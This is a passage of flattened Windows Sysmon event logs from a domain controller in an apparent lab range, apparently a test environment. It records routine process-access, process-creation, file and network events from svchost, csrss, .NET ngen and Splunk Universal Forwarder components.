21:01:57.055{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019345Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:57.055{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019344Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:57.055{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A145-60D3-CC02-00000000CF01}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019343Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:57.055{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019342Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:57.055{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019341Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:57.055{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A145-60D3-CC02-00000000CF01}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019340Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:57.056{4DB9351A-A145-60D3-CC02-00000000CF01}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019370Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.773{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A146-60D3-CF02-00000000CF01}5568C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019369Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.758{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A146-60D3-CF02-00000000CF01}5568C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019368Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.758{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A146-60D3-CF02-00000000CF01}5568C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019367Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.664{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A146-60D3-CE02-00000000CF01}856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019366Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.648{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A146-60D3-CE02-00000000CF01}856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019365Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.648{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A146-60D3-CE02-00000000CF01}856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019364Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.539{4DB9351A-A144-60D3-CB02-00000000CF01}5936NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KNYONB6P42\System.Workflow.Activities.ni.dll.auxMD5=D1C9D6C281FD10D3EA0ABE7773CEE5CD,SHA256=6334460E47D65AB61BD30EA454E063DC95CDECBBA069A382214D554884C96FAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019363Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.539{4DB9351A-A144-60D3-CB02-00000000CF01}5936NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KNYONB6P42\System.Workflow.Activities.ni.dllMD5=A7203C7CA28EC5708948AAB0C8415F0D,SHA256=13C2E328D5DAD8783A82899C4B5F2F7C65D0CE2A60F95F976FD83F057109018B,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000019362Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.508{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FD542D7CAC91EF6271FEADBDF58CBB3,SHA256=BE24E988D30C875F573D3EE6426AE401B12E77E86088CB5B3C3D73D246592922,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000019361Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:58.445{4DB9351A-A144-60D3-CB02-00000000CF01}5936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1730-0\System.Workflow.Activities.dll2021-06-23 21:01:58.445 10341000x800000000000000019360Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.273{4DB9351A-A146-60D3-CD02-00000000CF01}55484296C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000019359Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:56.201{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61378-false10.0.1.12-8000- 23542300x800000000000000019358Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.070{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D543C6CF8B7898B9330CC508E40787EC,SHA256=C7E12CE33C4BA9B1E76791F62755DBCEB8C418C96602D125506E076528E40EAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019357Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.070{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A146-60D3-CD02-00000000CF01}5548C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019356Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.070{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019355Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.070{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019354Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.070{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019353Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.070{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019352Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.070{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A146-60D3-CD02-00000000CF01}5548C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019351Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.070{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A146-60D3-CD02-00000000CF01}5548C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019350Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:58.071{4DB9351A-A146-60D3-CD02-00000000CF01}5548C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019380Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.680{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A147-60D3-D002-00000000CF01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019379Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.664{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A147-60D3-D002-00000000CF01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019378Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.664{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019377Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 